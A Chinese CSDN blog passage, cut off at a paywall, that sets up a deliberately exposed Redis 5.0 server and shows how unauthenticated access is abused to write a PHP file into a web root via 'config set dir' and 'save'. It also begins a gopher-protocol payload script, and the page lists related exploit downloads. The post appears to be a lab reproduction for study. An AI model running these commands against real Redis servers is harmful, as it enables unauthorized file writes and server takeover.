Redis系列漏洞总结

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量5.8k 收藏 14
点赞数 6
分类专栏: 渗透 文章标签: ubuntu redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42280544/article/details/108943910
版权

Redis系列漏洞总结

文章目录

环境:ubuntu16.04,redis5.0.1

redis下载及安装

  • 下载

    wget http://download.redis.io/releases/redis-5.0.0.tar.gz

  • 解压

    sudo tar xzvf redis-5.0.0.tar.gz

  • 创建文件夹

    mkdir /usr/local/redis5

    mkdir /etc/redis5

  • 移动文件

    cp -r redis-5.0.0/* /usr/local/redis5/

  • 进入安装目录进行安装

    ls /usr/local/redis5/

cd  /usr/local/redis5

sudo make

cd /usr/local/redis5/src/
sudo make test  //如果安装报错,更新tcl:sudo  apt install tcl8.6,再重新运行
sudo make install //安装

  • 查看编译好的命令文件

    ls /usr/local/bin/redis-*

    --/usr/local/bin/redis-benchmark     性能测试工具
--/usr/local/bin/redis-check-aof     更新日志检查
--/usr/local/bin/redis-check-dump    本地数据文件检查
--/usr/local/bin/redis-cli           命令行操作工具
--/usr/local/bin/redis-server        服务器程序

  • 修改配置文件

    cd /usr/local/redis5

    cp redis.conf /etc/redis5/

    vim /etc/redis5/redis.conf

    bind 0.0.0.0(允许登陆redis服务的ip,默认是127.0.0.1(设置为127.0.0.1的话就相当于redis服务只能本机进行登,如果设置成 0.0.0.0 就相当于将redis暴露在公网中,公网中的机器都可以进行登陆)
protected-mode no (如果开启则会禁止公网访问redis)
daemonize yes//改为后台运行

  • 启动

    cd /usr/local/redis5

    redis-server /etc/redis5/redis.conf

  • 关闭

    redis-cli shutdown
    redis-cli -p 6379 shutdown
    redis-cli -h 192.168.9.206 -p 6379 shutdown

    (根据情况选择关闭服务器命令)

redis 漏洞利用方式

0x01 绝对路径写shell

  • 环境

    靶机ubtuntu16:118.31.47.97

    sudo apt install apache2
sudo apt install php
sudo apt install php-redis
sudo apt-get install libapache2-mod-php
sudo apt install php-curl

    攻击主机ubuntu16 本机

    服务器:redis5.0.0,apache,php

  • 利用条件

    能未授权或者能通过弱口令认证访问到Redis服务器

    root权限启动redis服务

    需要知道目标的web目录绝对路径

  • 漏洞复现

    使用客户端连接redis数据库,并测试手动写shell

    flushall
set 1 '<?php phpinfo(); ?>'
config set dir /var/www/html
config set dbfilename phpinfo.php
save

    在这里插入图片描述

    接下来使用gopher协议来将shell转换成RESP格式

    #!/usr/bin/env python
# -*-coding:utf-8-*-

import urllib
protocol="gopher://"  # 使用的协议 
ip="118.31.47.97" #此处ip为redis服务器ip
port="6379&
最低0.47元/天 解锁文章
极光时流
关注
  • 6
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
ArrayNetworksL3Setup最新版.rar
09-05
软件介绍: ArrayNetworksL3Setu是移动代理点客户端软件,也就是常说的那个红A。需要安装这个软件后才能登陆。BOSS 客户端更新说明为了解决现有BOSS系统BUG,现在需要升级各代办点终端的SSL 的插件,具体插件步骤如下:1.将附件中名称为:“ArrayNetworksL3OnlyWebSetup.zip”的安装包拷贝到代办终端上。 2.在代办终端上解压该文件3.点击“setup.exe”4.一步步安装首先remove现有的插件。点击“next”,点击“finish”,再点击“setup.exe”,点击“finish”完成安装。完成后开始使用,打开IE浏览器。输入移动 IP地址。IE版本可能会出现,点击“允许”,当右下角出现“A” 上面出现8.4.6.80确认为新的插件版本。出现红A,没有任何报错就表示安装正常。-----------------------------------------------------------------------------------------------------如果安装有问题或者不能正常访问,请单独安装客户端。安装的文件名称ArrayNetworksL3SetupX32.zip,ArrayNetworksL3SetupX64.zip请对应系统的版本安装1查看自己的系统的版本,32位,64位2.“计算机”-->“属性”查看自己的是32位的还是64位的操作系统。请对应版本安装。4.安装客户端软件的步骤,首先解压文件。点击 “setup.exe”安装完成。打开IE登陆SSL 如重启失败请重置浏览器的高级设置。点击---“还远高级设置”---“确定”再次登陆
Redis未授权访问漏洞搭建复现
m0_58595840的博客
01-05 2744
Redis未授权访问漏洞利用方式总结(含靶场搭建)
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 881
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
速看!又一个 Redis 高危漏洞,可植入隐秘后门允许命令执行
easylife206的专栏
12-11 571
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !被研究人员称之为Redigo的一种基于Go的新的恶意软件,它一直针对有CVE-2022-0543漏洞Redis服务器并植入一个隐秘的后门允许命令执行。CVE-2022-0543是Redis(远程字典服务器)软件中的一个关键漏洞,具有非常高的威胁性。它在2022年2月被发现并修复。修复几个月后,仍有攻击者继续在未打补...
Redis应用问题解决(穿透、击穿、雪崩、更新、预热、降级)
给自己一个smile
03-28 1739
Redis应用问题解决-穿透、击穿、雪崩、降级、更新、预热方法
【简单复现】Redis 4.x/5.x 未授权访问漏洞
qq_45751902的博客
10-06 1070
开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限(我们可以将dir设置为一个目录A,而dbfilename为文件名B,再执行save或bgsave,则我们就可以写入一个路径为/A/B的任意文件。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,因为是实验环境,靶机端口没有改,redis密码没有设置(设置的话,需要爆破)等,这样将会将Redis服务暴露到公网上,如果在没有设置。
Redis系列漏洞总结1
08-03
1.使SET和GET命令,可以完成基本的赋值和取值操作 2.Redis是不区分命令的写的,set和SET是同个意思 3.使keys *可以列出当前数据库中的所有
Redis常见漏洞利用方法总结1
08-03
Redis(Remote Dictionary Server ),即远程字典服务,是个开源的使 ANSI C 语编写、持络、可基于内存亦可持久化的志型、Key-
Redis基础笔记总结
04-23
Redis基础笔记总结
Redis个人学习总结
03-25
Redis个人学习总结
redis 技能总结.mmap
08-02
总结了java开发和数据分析中,涉及到的redis的诸多方面,面向理论,注重实践,适用于中高级开发工程师和DBA等。
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
Redis 漏洞总结
qq_41696518的博客
06-26 2982
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
JS专题 array[String] 排序 replace的全部替换使用总结
weixin_44131922的博客
06-14 848
let tempstr = JSON.stringify(_this.Meetingsign1.jobName).substring(1,JSON.stringify(_this.Meetingsign1.jobName).length-1) let tmpstr2 = tempstr.replace(/"/g,'') // /g表示的全部替换 /g前的 " 为要替换的符号,逗号后为替换的内容 let temparr = tmpstr2.split(",") // 转数组 let arrst
redis非授权访问漏洞
weixin_43995159的博客
11-29 1204
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
Redis v6.0.5未授权访问漏洞复现
bigblue00的博客
09-27 1042
Redis因配置不当和未授权访问。导致无需认证就可以访问到内部数据,可导致敏感信息泄露,也可以通过config 命令,可以进行写文件作操。 复现环境: 服务器: Centos 7.5 Redis Server redis v6.0.5 redis.conf 文件以下两处进行修改 1、注释掉 bind 127.0.0.1 2、protected-mode no 攻击机:Centsos 7.5 Redis Client 复现过程: 1、 服务端启动 redis server 2、攻击机连接server ./
redis未授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
Mac下Redis环境搭建
咻咻ing的专栏
01-08 237
Redis安装 $ brew install redis Updating Homebrew... ==&gt; Downloading https://homebrew.bintray.com/bottles/redis-5.0.3.sierra.bottle.tar.gz ###########################################################...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值